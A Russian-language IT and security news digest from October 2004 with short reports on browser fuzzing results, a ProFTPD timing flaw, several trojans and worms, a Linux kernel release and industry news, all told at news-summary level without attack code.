Во вторник глава федеральной комиссия США по связи (FCC) Майкл Пауэлл (Michael Powell) заявил, что будет добиваться усиления регулятивной роли своего ведомства в области услуг интернет-телефонии. Как сообщает Associated Press, Пауэлл считает, что если интернет-телефонию не взять под контроль федеральной комиссии по связи, развитие отрасли будет сильно ограничено неразберихой в местных правилах и законах, касающихся этой области услуг. По словам Пауэлла, он представит свое предложение на рассмотрение членов комиссии в течение месяца. "Мы займемся лишь урегулированием законов, касающихся использования интернет-телефонии. Нужды в регулировании налогообложения и ценовой политики нет", - подчеркнул он. Согласно прогнозам исследовательской компании Yankee Group, до конца 2004 года интернет-телефонией в США будут активно пользоваться не менее миллиона человек. В конце 2003 года таких людей было лишь 130 тысяч.
Lenta.Ru

19/10/2004 15:00 Включение Samba-сервера в в домен под управлением Windows 2000 Server
Благодаря opennet.ru обнаружена интересная статья Морозова Ивана, студента СевКавГТУ г.Пятигорск, "Включаем Samba 3 в домен с контроллером домена под Windows 2000 Server", которая по шагам расписывает процедуру включения Samba 3-сервера под управлением Linux в домен под управлением Windows 2000 Server.
Статья

19/10/2004 12:03 Уязвимости во многих браузерах
Произошло небывалое до сего дня событие - обнаружены уязвимости во многих популярных браузерах, кроме многострадального Internet Explorer-а. Как пишет в Full-Disclosure известный исследователь безопасности Michal Zalewski, им была проведена проверка потенциальных уязвимостей большинства популярных браузеров. Проверка осуществлялась при помощи специального скрипта, написанного для этих целей - mangleme (исходник которого доступен для скачивания и ознакомления). Скрипт, как пишет автор, используется для генерации простых некорректных (для браузеров) HTML-страниц (без использования таблиц, скриптов, специфических особенностей браузеров). Тестированию были подвергнуты: Microsoft Internet Explorer, Mozilla / Netscape / Firefox, Opera, Lynx, Links (последние 2, как известно - текстовые). Примечательны результаты этого тестирования - в результате ВСЕ браузеры, кроме IE (что довольно необычно, надо признать) в итоге сваливались по различным причинам: из-за некорректной обработки ссылки на нулевой указатель (NULL pointer), повреждение системной памяти, переполнение буфера, исчерпание всей доступной памяти, зацикливание в проецссе обработки некорректного тега и т.д. В результате исследования были выпущены HTML-файлы, приводящие к отказу каждого из браузеров. Производители браузеров поставлены в известность, но судя по всему, исправления пока не выпущены. Об уязвимости сообщил посетитель нашего форума .cens, за что ему отдельное пионерское спасибо. ;)
Описание

19/10/2004 11:59 Новый продукт Google способствует утечке данных
Использование нового продукта Google Desktop Search, позволяющего производить поиск на РС и в интернете, может быть рискованным, предупреждают эксперты. Пользователи компьютеров, установленных в интернет-кафе, библиотеках и др. общественных заведениях, подвергают себя риску утечки конфиденциальной информации в сторону последующих пользователей даных машин. Недобросовестные посетители могут узнать содержание чужих электронных писем, IM-сообщений и др. Продукт Google Desktop Search, бета-версия которого вышла на днях, автоматически записывает электронные письма, проходящие через Outlook, Outlook Express и Internet Explorer. Также поисковая программа записывает копии веб-страниц, просматриваемых через Internet Explorer, чаты America Online, а также файлы Excel и PowerPoint. Весь этот объем информации хранится на жестком диске и может быть использован любым пользователем публичного компьютера.
Yahoo

19/10/2004 11:26 Хакеры атакуют химические заводы
Химические, нефтеперерабатывающие и другие промышленные предприятия подвергаются серьезным угрозам в связи с постоянными атаками хакеров. По мнению многих аналитиков, это является постоянным риском для человеческих жизней и окружающей среды. Промышленные предприятия в мире испытыват в год от 100 до 500 серьезных атак хакеров и компьютерных вирусов, ведущих к прерыванию контроля над производственными процессами с возможными катастрофическими последствиями. Согласно результатам исследования британского технологического института Columbia и PA Consulting, количество таких атак резко возрастает по мере того, как все больше предприятий связывают системы управления производством с внутренними компьютерными сетями и интернетом. Так, российские хакеры получили на 24 часа контроль над крупным газопроводом. В другом случае, безработный австралиец атаковал службу канализации, что привело к разлитию 250 млн. тонн сточных вод. Тем не менее руководители многих промышленных предприятий по прежнему уделяют мало внимания установке брандмауэров, антивирусных программ и других защитных средств, сообщил Computerweekly.
CNews

19/10/2004 11:12 Троян TubbyT изменяет настройки Internet Explorer
Компания Sophos предупреждает о появлении новой вредоносной программы, получившей название TubbyT. После запуска троян TubbyT записывает в системную директорию Windows файл adv.dll, ссылка на который добавляется в ключ автоматического запуска реестра, и затем самоуничтожается. Впоследствии DLL-компонент может загружать на инфицированный компьютер дополнительные программные модули из интернета, а также изменять стартовую страницу браузера Internet Explorer. Троян TubbyT может быть деактивирован путем выполнения команды "regsvr32 /u \adv.dll".
Описание

19/10/2004 10:39 Эксплоит уязвимости в ProFTPD
Leon Juranic из хорватской LSS Seurity Team (Laboratory for Signals and Systems) обнаружил уязвимость в популярном в мире открытых систем FTP-сервере ProFTPD. Cуть уязвимости заключается в том, что в заивисимости о того, зарегистрирован пользователь в системе или нет наблюдается разный временной интервал ответа на сервера на команду USER. Используя так называемую тайинг атаку, можно определить приблизительный перечень зарегистрированных пользователей. Уязвимость присутствует в версиях 1.2.8, 1.2.10 в файле proftpd-1.2.10/modules/mod_auth.c. Автором опубликован исходный код, при помощи которого можно осуществить подобную атаку.
Эксплоит

19/10/2004 10:23 Microsoft выпустила "заплату" на обновление SP2
Microsoft выпустила «заплату» для Windows XP Service Pack 2. «Заплата» призвана решить проблему несовместимости обновления и рекламного ПО. Конфликт между SP2 и программой TV Media, установленной на компьютерах многих пользователей, вызывал сбои в работе вплоть до полного отказа системы. С момента выпуска обновления (с августа текущего года) множество пользователей обратились в службу технической поддержки Microsoft с жалобами на постоянные перезапуски компьютера и другие проблемы. Как выяснилось, причина заключается в рекламном ПО, наличие которого на компьютере часто неизвестно пользователю. «Заплата» на SP2 под названием Critical Update 885523 не позволяет установить обновление до удаления TV Media. Многие эксперты отмечают, что в течении последней недели на ИТ-администраторов нахлынула лавина «заплат» для Windows, что заставит многих из них усомниться в надежности данной ОС.
securityLab

19/10/2004 10:08 Авторы червя MyDoom празднуют победу в "вирусной войне"
Сотрудники антивирусных компаний обнаружили очередную модификацию известного сетевого вируса MyDoom, в которой содержатся угрозы в адрес специализирующихся на компьютерной безопасности фирм F-Secure, Symantec, Trend Micro и McAfee, а также высмеивается автор "конкурирующего" вируса NetSky. Как сообщает CNET News, авторы запустили новый вирус в минувшие выходные. Он содержит стандартные средства для несанкционированного проникновения в системы семейства Windows и саморепликации. Эксперты ожидают в ближайшее время новой волны распространения вируса среди незащищенных компьютеров. Вирус содержит текстовое сообщение, где высмеивается ожидающий суда немецкий подросток Свен Яшан (Sven Jaschan), признавшийся в авторстве широко распространившихся вирусов Sasser и NetSky, обладающих функциональностью, схожей с MyDoom. Авторы MyDoom (за информацию об их местонахождении обещана награда в 250 тысяч долларов) заявляют, что после поимки Яшана они "выиграли вирусную войну" и теперь намерены "атаковать" антивирусные компании и продолжать свою вредоносную деятельность. Вместе с тем, специалисты компаний отмечают, что не понимают, каким именно образом их собираются атаковать. В теле вируса не обнаружено каких-либо специальных средств для этого, остается лишь возможность организованной DDOS-атаки на серверы упомянутых фирм, однако компании такого профиля обычно хорошо подготовлены к таким инцидентам.
Lenta.Ru

19/10/2004 09:56 Выход ядра Linux 2.6.9
Выпущена новая версия ядра Linux ветки 2.6 - 2.6.9. Основные изменения: удалены старые системные вызовы и переименованы новые (old_mmap и др.); исправлена ошибка при работе SMP систем с USB2.0; изменения в документации по разработке ядра; добавлен хорошо документированный драйвер для гигабитного сетевого адаптера Marvel MV64340 (с поддержкой NAPI); добавлен DRM модуль для i915; исправления в XFS, ACPI, USB, XFS, UML, SELinux, реализациях различных архитектур (ARM, X86, PPC64, ALPHA, X86_64, IA64, MIPS, SPARC64 и др.).
Изменения

19/10/2004 09:49 Недельный отчет о вирусах Panda Software
После длительного перерыва выпущен недельный отчёт о вирусной активности прошедшей недели от компании Panda Software. В отчёте рассморены: Netsky.AG, Darby.gen, JPGTrojan.D, Funner.A и Nemsi.A.
Отчёт

19/10/2004 09:14 Microsoft хочет запустить русские версии Hotmail и MSN
Корпорация Microsoft рассматривает возможность создания русских версий своих популярных интернет-сервисов Hotmail и Microsoft Network (MSN). Об этом, как передает Associated Press, говорится в опубликованном в понедельник интервью председателя правления корпорации Стива Болмера (Steve Ballmer). По его словам, американской версией бесплатной почтовой системы Hotmail в настоящее время пользуется около 5 миллионов "русских". Компания может открыть для русских пользователей отдельный сервис, однако о конкретных планах по запуску такого проекта Болмер не сообщил. Он отметил, что Россия продолжает сохранять одну из лидирующих позиций по уровню компьютерного пиратства, из-за чего, в частности, в Россию официально не поставляется производимая Microsoft популярная игровая телеприставка X-box. Вместе с тем, Болмер напомнил, что накануне Microsoft представила русскую версию операционной системы Windows XP Starter Edition с урезанной функциональностью и низкой ценой. Вместе с тем, в компании не ожидают, что эта система завоюет популярность на российском рынке, потому что правительство РФ не принимает мер по обеспечению населения компьютерами по доступной цене, заявил Болмер.
Подробности

18/10/2004 16:26 Попапы — 2: они возвращаются
Прошло уже два месяца с тех пор, как Microsoft добавила попап-фильтр в Internet Explorer. Казалось бы, на этом история надоедливых окошек должна закончиться. Но нет. Хитрые рекламщики придумали способ обхода фильтра. Фильтр попапов от MS сейчас работает у 40 миллионов сетеходов. Иными словами, у всех тех, кто загрузил и установил у себя на компьютере Service Pack 2. Фильтр автоматически закрывает рекламные окна, независимо от того, выскочили они поверх просматриваемой страницы или за ней. К этой армии отказавшихся от рекламы интернетчиков, конечно же, нужно добавить тех, кто пользуется другими попап-фильтрами (например, от Google, Yahoo, MSN). Кроме того, национальное голосование, проведенное в США и посвященное исключительно проблеме попапов, показало, что почти половина сетеходов против этого вида рекламы, однако рекламные конторы не сдаются и продолжают продвигать свое назойливое детище вопреки всем сопротивлениям интернет-общественности. Ведь всем прекрасно известно, что водичка дырочку найдет. Некоторые веб-издатели, не желающие терять прибыть от выпрыгивающей рекламы, нашли способ обойти фильтр IE и все-таки показать сетеходу окошко с коммерческим предложением. Представители семейства «мышей» (рекламных агентств и площадок) утверждают, что объем показываемых попапов в последние месяцы, конечно, несколько снизился, однако не столь драматически, как можно было бы ожидать. Согласно исследованию Nielsen/NetRatings, объем попап-рекламы все еще составляет 6% от всего объема рынка интернет-рекламы. Точно такой же уровень был и в октябре 2003 года, так что ситуация совершенно не изменилась, отмечает News.Com. Забавно, но из-за блокировки попапов эффективность этой рекламы только выросла. Как говорят фигуранты рынка, средний CTR по «окошкам» за последнее время возрос с 10% до 30%.
"Вебпланета"

18/10/2004 16:07 Macromedia совершенствует Flash-сервер
На этой неделе Macromedia анонсирует новую версию серверного программного обеспечения Flex, предназначенного для расширения использования формата Flash в интерфейсах веб-приложений и графике. Версию Flex 1.5 предполагается выпустить в ноябре. В нее войдет расширенный набор компонентов для создания специализированных интерфейсов и новые инструменты для превращения корпоративных данных в динамические диаграммы и другие виды графического представления информации. Macromedia выпустила Flex в начале этого года в рамках программы по расширению области применения своего анимационного формата Flash — который некогда ассоциировался с мелькающими баннерами — и его превращению в платформу разработки веб-приложений. Flex призван обойти одно из вечных препятствий на пути к широкому признанию Flash — графический интерфейс программирования, традиционно используемый для создания Flash-контента. Flex позволяет разработчикам Java и другим программистам, не специализирующимся на формате Flash, работать в привычной для них текстовой среде, создавая код XML, оптимизированный для клиентского ПО Flash. В Flex 1.5 добавлена поддержка других серверных платформ, в том числе Oracle Application Server 10g, IBM AIX Unix и Fujitsu Interstage 6. Кроме того, новая версия позволяет исполнять приложения вне веб-браузера, через разрабатываемый Macromedia проект Central по созданию структуры для самостоятельных Flash-приложений.
Подробности

18/10/2004 14:08 Телефоны с поддержкой BlackBerry подвержены риску DoS-атак
Антивирусная компания Secunia предупредила владельцев дорогих мобильных телефонов и карманных устройств, поддерживающих BlackBerry, об обнаружении в этой технологии уязвимости, позволяющей злоумышленникам временно выводить аппараты из строя, заставляя их перезагружаться. Суть дефекта кода состоит в том, что программа, отвечающая за обработку почты, не способна обработать запросы с полями, превышающими 128 килобайт. Любой более "крупный" запрос приводит к мгновенной перезагрузке телефона. К счастью, данные при этом не теряются. По информации CNET, проведение DoS-атак возможно в отношении смартфонов, работающих под управлением программного обеспечения компании Research In Motion версии 3.7 SP1 и, по всей видимости, моложе. В программах версии 3.8 и старше дефект, вроде бы, устранен.
Internet.Ru

18/10/2004 13:34 Shinco Z2: MP3-плеер в качестве загрузочного диска
Французская компания Shinco специализирующаяся на производстве портативных DVD-проигрывателей представила MP3-плеер, который позволяет производить загрузку компьютера – Z2. Внешне новинка выполнена в форме медальона, а ее размеры (42 мм в диаметре) позволяют носить ее на шее без каких-либо проблем. Плеер способен воспроизводить MP3-файлы, также есть возможность использования плеера в качестве портативного носителя информации. Максимальная выходная мощность составляет 4 мВт на канал при сопротивлении 16 Ом, соотношение сигнал-шум равняется 90 дБ. Питание происходит от встроенного Li-ion аккумулятора, одного заряда которого достаточно для 8 часов автономной работы, обмен данными с компьютером происходит при помощи интерфейса USB 2.0. Новинка будет продаваться в двух вариантах отличающихся объемом памяти, 128 Мб и 256 Мб. Cамое интересное, новинка обладает предустановленным дистрибьютивом операционной системы Linux под названием Shinux. Благодаря ему, плеер можно использовать как загрузочный диск, но только на компьютерах в которых BIOS поддерживает загрузку через USB интерфейс. Помимо этого Shinux обладает достаточно широким набором программного обеспечения, которого вполне достаточно для начала работы.
Mobile-Review

18/10/2004 13:21 За фишинг первыми накажут "бывших" русских
На прошлой неделе в Лондоне четверым интернет-мошенникам впервые за всю судебную историю были предъявлены обвинения в фишинге — технологии обмана пользователей с целью получения конфиденциальной информации, когда ни о чем не подозревающую жертву перенаправляют на внешне абсолютно «невинные» сайты для кражи личных данных, в том числе, и о кредитных картах. Интернет-мошенники – двое мужчин и две женщины - являются выходцами из стран Восточной Европы: России (Ольга Борисова, 31 год), Эстонии (Лиив Равино (Liiv Ravino), 30 лет, и Тени Терье (Teni Terje), 25 лет) и Украины (Виталий Кириленко (Vitalij Kirilenko), 34 года). Им предъявлены обвинения в преступном сговоре с целью обмана финансовых организаций и отмывании денег. Как заявляют истцы, преступная четверка является частью целой группировки мошенников, снимающих деньги с банковских счетов пользователей интернета, у которых обманным путем выманили информацию о номерах счетов и паролях. Обвинения были выдвинуты 14 октября в лондонском магистратском суде на Боу-стрит. Четверо обвиняемых были арестованы в Великобритании еще в мае этого года, наряду с десятком других подозреваемых в интернет-мошенничестве. Их выпустили под залог, обязав явиться на предварительное слушанье, которое состоится 21 октября в королевском суде Саутворка (Southwark Crown Court) в Лондоне, сообщает газета Financial Times. По словам представителей Национального департамента по борьбе с преступлениями в сфере высоких технологий Великобритании (NHTCU), подразделения Скотленд-Ярда, обвинения в фишинге были предъявлены впервые в мире. NHTCU разыскивает сейчас еще трех подозреваемых в фишинге, которые, несмотря на подписку о невыезде, покинули страну и скрываются, по всей видимости, у себя на родине в Восточной Европе.
CNews

18/10/2004 12:45 Троян Keenval загружает на компьютер adware
Компания "Лаборатория Касперского" сообщает об обнаружении новой вредоносной программы Keenval. Троян Keenval размером около 33 кб поражает компьютеры с операционными системами Microsoft Windows. После проникновения на машину-жертву троян соединяется с одним из сайтов в интернете, с которого пытается загрузить дополнительный adware-модуль. Этот модуль, в свою очередь, перенаправляет интернет-браузер на сайт http://tracking.thunderdownloads.com. Одним из признаков, свидетельствующих о заражении ПК вредоносной программой Keenval, является наличие на жестком диске файла с именем KeenValueInstall.exe. Впрочем, пока троян широкого распространения не получил.
Описание

18/10/2004 12:12 Rainbow Technologies: служба технической поддержки LiveSecurity
Компания Rainbow Technologies сообщает о том, что рассылка службы LiveSecurity - наиболее полного в индустрии предложения технической поддержки и услуг для пользователей межсетевых экранов WatchGuard Firebox перешагнула 100-ый рубеж. Уже пять лет пользователи WatchGuard Firebox получают наиболее полную в индустрии техническую поддержку от службы LiveSecurity: своевременные предупреждения о новых угрозах и атаках, профессиональные советы о методах борьбы с уязвимостями, результаты исследований вопросов безопасности, обучающие статьи, руководства и тренинги. В юбилейной 1000-ной рассылке LiveSecurity выявлены различия и, что еще более удивительно, сходства между обеспечением информационной безопасности в 1999 году и сегодня. Сравнение предыдущих и нынешних рассылок LiveSecurity показывает, что сегодня, как и пять лет, важно соблюдать пять основных принципов управления безопасностью: наличие политики безопасности, регулярное обновление антивирусов, наличие межсетевого экрана и последних обновлений в нём, соблюдение «твердых» принципов (удаление стандартных настроек и ненужных функций при инсталляции коммерческих приложений, во избежание дефектов защиты от атак хакеров). Во всех рассылках, с момента их возникновения, служба LiveSecurity предупреждает подписчиков о различных вирусах, угрозах и изъянах программного обеспечения. Например, первое извещение, отправленное 11 января 1999г., предупреждало о вирусе из России. В рассылках специалисты объясняют подписчикам, как нужно защищать домашнее DSL-соединение (самая популярная тема в 1999г.) и как защищать корпоративные сети от атак, идущих, в том числе, со смартфонов и с КПК. Большинство последних статей рассказывают, какие из существующих анти-шпионских бесплатных программных продуктов на самом деле являются шпионским ПО. Бесплатная подписка на рассылку службы LiveSecurity (90 дней) включена в поставку каждой модели WatchGuard Firebox.
Rainbow Technologies

18/10/2004 10:31 Семинар от "ДиалогНауки"
27 октября компания "ДиалогНаука" (известная своим антивирусом DrWeb) проводит семинар "Комплексные антивирусные и антиспамовые решения для защиты корпоративных сетей". На семинаре будут рассмотрены разнообразные антивирусные и антиспамовые решения. Вниманию будут предложены сообщения про интегрированные решения от компании Sybari, многоплатформенные решения от компании Sophos и антиспамовые технологии от отечественной компании Яндекс. Семинар состоится по адресу: Москва, ул. Вавилова, д. 40, ВЦ РАН.
Подробности и форма заявки

18/10/2004 09:27 Антивирус Касперского 5.0 для Sendmail с Milter API
"Лаборатория Касперского" сообщает о выпуске полнофункциональной коммерческой версии Антивируса Касперского 5.0 для Sendmail с Milter API. С ее появлением продуктовая линейка "Лаборатории Касперского" пополнилась продуктом, созданным специально для антивирусной защиты почтовой системы Sendmail с поддержкой технологии Milter API. Антивирус Касперского для Sendmail с Milter API предназначен для обеспечения антивирусной безопасности почтового трафика Linux\Unix-сервера. Продукт функционирует совместно с почтовой системой Sendmail, поддерживающей Sendmail's Content Management (Milter) API. Milter API - интерфейс, предоставляющий внешним программным приложениям доступ к почтовым сообщениям, обрабатываемым Sendmail. Тем самым он позволяет осуществлять дополнительную обработку и редактирование содержимого и мета-данных почтового сообщения. Анализ входящего и исходящего почтового трафика обеспечивает надежный контроль над источниками проникновения вредоносных кодов. В случае необходимости, программный комплекс быстро и надежно нейтрализует вирус, полностью исключая его дальнейшее распространение. Помимо этого, безопасность находящейся под защитой Антивируса Касперского электронной корреспонденции обеспечивается за счет дополнительной фильтрации почтового трафика по именам и MIME-типам вложенных файлов, а также по размеру (декодированных) вложений.
"Лаборатория Касперского"

18/10/2004 09:24 Microsoft и Cisco объединяют усилия в борьбе с вирусами
Софтверная корпорация Microsoft и один из крупнейших мировых производителей компьютерного сетевого оборудования Cisco Systems в понедельник объявили о начале совместной работы по выработке общих стандартов и систем для обеспечения компьютерной безопасности в сетях своих клиентов, сообщает Associated Press. На большинстве компьютеров мира используются операционные системы от Microsoft, оборудование Cisco работает в большинстве сетей. Обстановка в сфере сетевой безопасности постоянно обостряется, при этом злоумышленники широко используют недоработки Microsoft, позволяющие несанкционированно проникать в компьютеры пользователей или выводить их из строя. Уязвимости в системах Cisco также могут быть использованы при организации масштабных хакерских атак. В связи с этим две корпорации намерены разработать интегрированные инструменты, которые будут обеспечивать безопасность пользовательских терминалов и сетевого оборудования в рамках локальных сетей. В частности, предусматривается, что каждый новый терминал при присоединении к сети будет в обязательном порядке сканироваться на предмет наличия вредоносных программ. Поддержка подобных функций будет заложена в новых версиях семейства ОС Windows и оборудовании Cisco. Из-за распространения компьютерных вирусов, спамерских технологий и других технологий интернет-саботажа и мошенничества сети мира постоянно подвергаются атакам и эпидемиям. Это наносит ущерб мировой экономике на миллиарды долларов, в частности, страдают сети крупнейших компаний и организаций, среди которых много клиентов Microsoft и Cisco.
Lenta.Ru

17/10/2004 19:15 23% американских компаний используют в своей работе нелицензионное программное обеспечение
Почти каждая четвертая американская фирма так или иначе нарушает лицензионные соглашения об использовании коммерческого программного обеспечения. О том, что программное обеспечение воруют не только в Китае и в России, знают все. Но, как оказалось, основной ущерб софтверным компаниям наносят не столько пираты-кустари, режущие болванки на бытовых CD-приводах, сколько работники вполне респектабельных компаний, устанавливающие легально приобретенные программы с нарушением правил, указанных в лицензионных соглашениях. Об этом сообщает журнал PC World, ссылающийся на результаты очередного исследования, проведенного компанией Business Software Alliance. Как показало исследование, 23% американских компаний используют в своей работе нелицензионное программное обеспечение. Согласно расчетам компании (об этом пишет уже CNET), такая практика ежегодно обходится производителям программного обеспечения в 6,5 миллиардов долларов. Главной причиной такого безответственного поведения является, по мнению некоторых экспертов, банальное желание сэкономить на количестве приобретаемых лицензий. Соответственно, даже в крупных компаниях сплошь и рядом наблюдается практика установки одной лицензионной программы на несколько компьютеров. Свою посильную лепту вносит и запутанность законов, регулирующих отношения в этой деликатной сфере. Например, является ли нарушением повторная установка программы на один и тот же компьютер после обновления операционной системы? А после смены собственно компьютера? А если на старом компьютере осталась легально установленная копия? Если задать эти вопросы сотне юристов, специализирующихся на защите авторского права, интервьюер рискует получить больше ста вариантов ответов.
Crime-Research

17/10/2004 18:59 Стандарт USB On-The-Go: замешан и завернут
Индустриальная группа USB Implementation Forum объявила о финальном принятии спецификаций USB On-The-Go (USB OTG) и готовности подстандарта к лицензированию. Спецификации USB OTG, разработанные ведущими компаниями индустрии, направлены на расширение функциональных возможностей привычного USB 2.0 при применении с портативной техникой (PDA, сотовыми телефонами, плеерами, цифровыми камерами и пр.) и позволяют устанавливать между устройствами одноранговые соединения без применения хост-архитектуры "ведущий-ведомый" и без участия ПК. Это позволит устанавливать соединение между такими аппаратами, как например, цифровой фотоаппарат и портативный принтер, PDA, мобильник; связывать два MP3 плеера для "перекачки" музыки и т.д. Как известно, некоторые продукты с поддержкой USB OTG появились на рынке еще до утверждения официальных спецификаций стандарта, однако, официально сертифицированные альянсом USB Implementation Forum продукты появятся не ранее конца 2004 года.
Mobile-Review

17/10/2004 18:48 SAP обновила Business One
Компания SAP AG выпустила новую версию бизнес-инструментария SAP Business One, реализовав в нем ряд функций, адресуемых малым и средним производственным предприятиям. Основное новшество - система планирования потребностей в материалах и комплетующих с упрощенным пользовательским интерфейсом на базе "мастеров". Расширены также возможности SAP Business One, рассчитанные на изначальную аудиторию пользователей системы - сервисные и рознично-торговые предприятия. В частности, в инструментарии предусмотрен набор CRM-функций, обеспечивающих поддержку и интеграцию деятельности по сбыту, обслуживанию и другим операциям, относящимся к работе с клиентами. Имеется модуль планирования исполнения сервисных заданий и система анализа прибавлений/потерь клиентуры. Еще одна новая особенность - интеграция инструментария с Microsoft Outlook.
"Открытые системы"

17/10/2004 18:25 Суперкомпьютеры NEC будут собирать в России
Московская компания «Стинс Коман» объявила о начале серийного производства в России многопроцессорных информационно-вычислительных комплексов под торговой маркой SeNECa. Московское ЗАО «Стинс Коман», специализирующееся на системной интеграции и поставках высокотехнологичного оборудования, начинает производство суперкомпьютеров на основе OEM-соглашения с японской корпорацией NEC. Как сообщил заместитель гендиректора «Стинс Коман» Игорь Крохин, по условиям соглашения ЗАО получает права на производство, распространение и техническую поддержку многопроцессорных информационно-вычислительных комплексов под торговой маркой SeNECa, построенных на основе серверов NEC с использованием 64-разрядных процессоров Intel Itanium. Новые серверы, помимо обеспечения роста производительности в различных приложениях, обладают целым рядом уникальных характеристик. Главная из них — высокая «живучесть» системы, показатель которой составляет 0,9999. «Компьютер с такой отказоустойчивостью можно было бы использовать для создания авиационных автопилотов, будь он немного легче…» — так прокомментировал возможности сервера технический директор «Стинс Коман» Борис Синицын. Кроме того, SeNECa позволяет создавать разделы, работающие одновременно под управлением различных операционных систем, например, Linux и Windows. При этом имеющиеся Windows-приложения можно использовать практически без ограничения числа пользователей. По мнению разработчиков, наилучшие результаты серверы серии SeNECa показывают в таких областях, как управление большими и сверхбольшими базами данных, создание автоматизированных систем бизнес — управления организациями и предприятиями, в банковских и биллинговых системах, веб-сервисах, консолидации серверного хозяйства крупных предприятий, в науке и технике. Суперкомпьютерные технологии, реализованные в SeNECa, были использованы при создании самого мощного на сегодняшний день суперкомпьютера — Earth Simulator.
CNews

17/10/2004 18:11 Новый разрушительный вирус распространяется "по старинке"
Эксперты финской антивирусной фирмы F-Secure обнаружили новый вирус Bacros. В отличие от современных вирусов, распространяющихся чаще всего через электронную почту и интернет, данная вредоносная программа использует устаревший метод копирования себя на флоппи-диски и CD. Через USB-карты вирус не распространяется. Bacros заражает локальную файловую систему компьютера, меняя все файлы формата .txt на .exe. Bacros не способствует краже информации, а нацелен на примитивное и бессмысленное разрушение. На Рождество на жестком диске зараженного PC стираются все файлы. Еще один факт, указывающий на «неадекватность» автора вируса — в начале каждого месяца все gif файлы стираются и вместо них записывается «Умри, Иегова» по фински. В День независимости Финляндии, приходящийся на 6 декабря, на фоне монитора зараженного компьютера появляется финский флаг, сообщил Silicon.
Источник

17/10/2004 17:47 MP3 теряет популярность?
Похоже на то, что формат сжатия аудиофайлов MPEG Layer 3, до сих пор являющийся синонимом словосочетания "оцифрованная музыка", начинает уступать место под солнцем конкурирующим проприетарным форматам от Apple и Microsoft. По данным исследовательской компании NPD Group, за последний год доля оцифрованных музыкальных композиций, сжатых в формате mp3, сократилась с 82 до 72 процентов. То есть, несмотря на то, что люди по-прежнему скачивают файлы в этом популярном формате, на каждый вновь записанный mp3-файл приходятся несколько стертых. Их место занимают композиции, приобретенные через онлайн-магазины iTunes, принадлежащие компании Apple, а также файлы, записанные с помощью кодека, разработанного Microsoft. За последний год рыночные доли обеих компании увеличились на пять процентных пунктов. По мнению некоторых аналитиков, пишет CNET, изменяется сама функция разработанного в Германии стандарта: теперь его используют для записи "временных" файлов, необходимых для того, чтобы оценить, достойна ли та или иная композиция того, чтобы быть купленной на iTunes или в обычном магазине по продаже компакт-дисков.
Internet.Ru

17/10/2004 17:23 Производительность Solaris 10
Компания Sun опубликовала результаты своего тестирования на производительность операционной системы Solaris OS на процессорах AMD Opteron, cообщает nixp.ru. Результаты, естественно, поражают:
- На схожих x86-системах Sun Java System Application Server под управлением Solaris 10 более чем вдвое быстрее IBM WebSphere и Linux (Red Hat Linux AS 3.0).
- Sun Java System Web Server: под управлением Solaris 10 на системах AMD Opteron производительность на 45 процентов выше машин с таким же железом и операционной системой Solaris 9.
- Клиенты Sun сообщают, что Solaris 10 OS превосходит по производительности Red Hat Enterprise Linux 3.0 на 14 процентов при работе с web-сервером Sun Java System Web Server и Apache соответственно.
- На системах с процессором AMD Opteron (сервер Sun Fire V20z) программный пакет Sun Studio 9 на Solaris 10 OS показывает на 60% лучшую производительность по сравнению с другими научными приложениями из open-source альтернатив, так же запущенных на Solaris 10.
- ПО Sun Studio 9 на Solaris 10 OS превосходит open-source компиляторы на Linux, выполняя на 63% больше транзакций в секунду.
- По данным тестирования BLAST, Sun Java Workstation W1100z (с 2,4-гигагерцовым процессором AMD Opteron) с работающей ОС Solaris 10 достигает на 61% большей производительности, чем Dell Precision 650 (с 3,2-гигагерцовым процессором Intel Xeon Processor MP) и операционной системой Red Hat Enterprise Linux 3.0.
Подробности

17/10/2004 15:54 Скажет ли Google hello IM?
Фанаты Google гудят о том, что за новым настольным инструментом поискового гиганта уже маячит следующий продукт: чат-сервис. Подобные слухи появляются не впервые, но на этой неделе всплыли некоторые интригующие факты. Во-первых, хотя об этом мало кто знает, у Google уже есть клиент немедленного обмена сообщениями (IM) Hello, который компания приобрела этим летом вместе со службой обмена фотографиями Picasa. А во-вторых, код, обнаруженный в выпущенной в четверг программе Google Desktop Search, указывает на существование у компании далеко идущих планов по введению IM в свой толстеющий портфель продуктов. По словам известного консультанта по компьютерной безопасности Ричарда Смита, изучив код настольного приложения, он обнаружил, что в программу включены файлы нового протокола google_im://. (Этот протокол позволяет настольному ПО взаимодействовать с Web-браузером.) «Это явный признак существования IM-клиента», — заявил он. Представитель Google заверил, что обнаруженный Смитом протокол не указывает на предполагаемый IM-продукт Google; это просто компонент, используемый для ввода IM-данных из America Online Instant Messenger с целью организации локального поиска по этим данным. Смит раскопал также кое-что из истории приложения десктоп-поиска, самого амбициозного нового продукта, выпущенного Google после первичного размещения своих акций на $1,7 млрд. Например, как следует из имени файла, обнаруженного в программном обеспечении Смитом, прежде, чем получить имя Google Desktop Search, этот продукт обозначался кодовым названием Total Recall (вспомнить всё). В Google это подтвердили и добавили, что проект фигурировал также под кодовым названием Fluffy Bunny.
Подробности

17/10/2004 15:37 Intel отказалась от выпуска 4-гигагерцового процессора Prescott
В четверг корпорация Intel отказалась от планов по выпуску 4-гигагерцового процессора Pentium 4, сообщает Associated Press. В компании полагают, что смогут достичь увеличения производительности чипов без повышения тактовой частоты. Ранее корпорация планировала выпустить процессор Intel Pentium 4 с ядром Prescott и тактовой частотой 4 ГГц в начале 2005 года. Изменения в производственной политике объясняются изменением главных приоритетов компании: теперь Intel делает ставку на развитие многоядерных микропроцессоров и разработку ряда других ключевых кремниевых технологий, включая разработку целых платформ для компьютеров. В Intel убеждены, что подобная стратегия наилучшим образом соответствует современным потребностям компьютерной индустрии. Компания планирует развивать и новые технологии, направленные на увеличение производительности чипов без повышения их тактовой частоты. В ближайшее время корпорация планирует выпустить процессор, работающий на меньших частотах (в перспективе - до 3,8 ГГц), с кэш-памятью объемом 2 Мб и производительностью, которая будет сопоставима или даже выше производительности планировавшегося к производству процессора c ядром Prescott и тактовой частотой 4 ГГц. Тем не менее символическая отметка в 4 ГГц будет достигнута в следующем поколении процессоров с иным ядром, отмечают представители Intel.
Lenta.Ru

15/10/2004 14:21 Атака на Windows с использованием SetWindowLong
